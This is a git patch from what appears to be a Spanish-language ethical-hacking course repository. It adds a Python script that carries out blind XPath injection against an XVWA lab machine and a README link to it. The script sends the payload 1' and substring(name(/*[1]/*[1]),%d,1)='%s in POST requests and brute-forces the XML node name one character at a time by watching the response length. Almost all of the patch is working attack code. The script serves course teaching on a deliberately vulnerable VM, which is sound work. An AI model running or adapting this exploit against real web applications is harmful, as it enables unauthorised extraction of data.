From b705ffba313e921ee4b061e13343c7a9ac1e5af7 Mon Sep 17 00:00:00 2001 From: Manuel Vergara Date: Sun, 25 Feb 2024 18:59:04 +0100 Subject: [PATCH] Update tema 6 --- .../tema_6_owasp/26_xpath/xpath_injection.py | 69 +++++++++++++++++++ .../tema_6_owasp/README7.md | 1 + 2 files changed, 70 insertions(+) create mode 100644 Introduccion-hacking-hack4u/tema_6_owasp/26_xpath/xpath_injection.py diff --git a/Introduccion-hacking-hack4u/tema_6_owasp/26_xpath/xpath_injection.py b/Introduccion-hacking-hack4u/tema_6_owasp/26_xpath/xpath_injection.py new file mode 100644 index 0000000..03e4648 --- /dev/null +++ b/Introduccion-hacking-hack4u/tema_6_owasp/26_xpath/xpath_injection.py @@ -0,0 +1,69 @@ +#!/var/bin/env python + + +import pdb +import requests +import signal +import string +import sys +import time + +from pwn import * + +# Ctrl-C handler + + +def signal_handler(signal, frame): + + print('\n\n[!] Ctrl-C. Saliendo...') + sys.exit(1) + + +signal.signal(signal.SIGINT, signal_handler) + + +# Variables globales + +main_url = "http://192.168.1.142/xvwa/vulnerabilities/xpath/" +characters = string.ascii_letters + + +def xPathInjection(): + + data = "" + + p1 = log.progress("Inyeccion XPath") + p1.status("Iniciando ataque de fuerza bruta") + + time.sleep(2) + + p2 = log.progress("Data") + + for position in range(1, 8): + + for character in characters: + # post_data = { + # 'search': "1' and substring(name(/*[1]),%d,1)='%s" % (position, character), + # 'submit': '' + # } + + post_data = { + 'search': "1' and substring(name(/*[1]/*[1]),%d,1)='%s" % (position, character), + 'submit': '' + } + + r = requests.post(main_url, data=post_data) + + if len(r.text) != 8686: + + data += character + p2.status(data) + break + + p1.success("Inyeccion XPath completada") + p2.success("Data: %s" % data) + + +if __name__ == "__main__": + + xPathInjection() diff --git a/Introduccion-hacking-hack4u/tema_6_owasp/README7.md b/Introduccion-hacking-hack4u/tema_6_owasp/README7.md index 5451925..aa67258 100644 --- a/Introduccion-hacking-hack4u/tema_6_owasp/README7.md +++ b/Introduccion-hacking-hack4u/tema_6_owasp/README7.md @@ -39,6 +39,7 @@ Para protegerse contra las vulnerabilidades de XPath, es importante validar toda A continuación, se proporciona el enlace directo de descarga a la máquina XVWA 1 de Vulnhub, la cual usamos en esta clase para explotar las vulnerabilidades existentes en XPath: - XVWA 1: https://www.vulnhub.com/entry/xtreme-vulnerable-web-application-xvwa-1,209/ +- script Python [xpath_injection.py](./26_xpath/xpath_injection.py) ## 6.27 Insecure Direct Object Reference (IDORs)